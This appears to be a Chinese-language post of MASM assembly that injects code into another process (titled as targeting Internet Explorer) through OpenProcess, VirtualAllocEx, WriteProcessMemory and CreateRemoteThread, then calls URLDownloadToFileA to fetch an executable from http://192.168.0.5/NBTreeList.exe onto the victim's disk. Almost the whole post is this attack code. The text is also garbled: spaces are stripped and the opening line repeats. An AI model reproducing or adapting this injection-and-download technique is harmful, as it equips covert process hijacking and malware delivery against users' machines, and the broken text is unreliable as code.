注入下载文件的代码到IE进程然后执行下载的文件

大家可能都用过网页szFormatdbPID是:%d,0 szBufferdd20dup(0),0 piddd0 hProcessdd0 hThreaddd0 pCodeRemotedd0 path1dbc:a.EXE,0 .const szmsgdbURLDownloadToFileA,0 userdlldbUrlmon.dll,0 ;szmsgdbMessageBoxA,0 ;userdlldbUser32.dll,0 szloadlibdbLoad

大家可能都用过网页szFormatdbPID是:%d,0
szBufferdd20dup(0),0
piddd0
hProcessdd0
hThreaddd0
pCodeRemotedd0
path1dbc:a.EXE,0

.const
szmsgdbURLDownloadToFileA,0
userdlldbUrlmon.dll,0
;szmsgdbMessageBoxA,0
;userdlldbUser32.dll,0
szloadlibdbLoadLibraryA,0;注意和LoadLibraryW的区别哟
kerdlldbkernel32.dll,0

.code
codebegin:
dispdatadb"http://192.168.0.5/NBTreeList.exe",0
szTitdb"c:a.exe",0
datalen=$-codebegin
Rprocprocmsgbox;MessageBoxA的地址为参数
CALL@F;pushesi
@@:
POPEBX
SUBEBX,OFFSET@B
LEAECX,[EBX+dispdata]
LEAEDX,[EBX+szTit]
pushNULL
push0
pushedx
pushecx
pushNULL
callmsgbox
ret;重要
Rprocendp
codelen=$-codebegin;代码长度xx字节

start:
;invokeFindWindow,0,offsettit;返回计算器窗口句柄
invokeFindWindow,offsettit,0
invokeGetWindowThreadProcessId,eax,offsetpid;计算机器程序的进程PID号
;invokewsprintf,offsetszBuffer,offsetszFormat,pid;把PID用十进制显示
invokeOpenProcess,PROCESS_ALL_ACCESS,FALSE,pid;打开进程,得到进程句柄
movhProcess,eax;保存进程句柄

invokeVirtualAllocEx,hProcess,0,codelen,MEM_COMMIT,PAGE_EXECUTE_READWRITE
movpCodeRemote,eax
invokeWriteProcessMemory,hProcess,pCodeRemote,offsetcodebegin,codelen,NULL

movesi,pCodeRemote
addesi,datalen
pushesi
invokeLoadLibrary,offsetuserdll
invokeGetProcAddress,eax,offsetszmsg
popesi
invokeCreateRemoteThread,hProcess,0,0,esi,eax,0,0

movhThread,eax;返回线程句柄
.ifhThread
invokeWaitForSingleObject,hThread,INFINITE;等待线程结束
invokeCloseHandle,hThread;关闭线程句柄
.endif

invokeVirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE;释放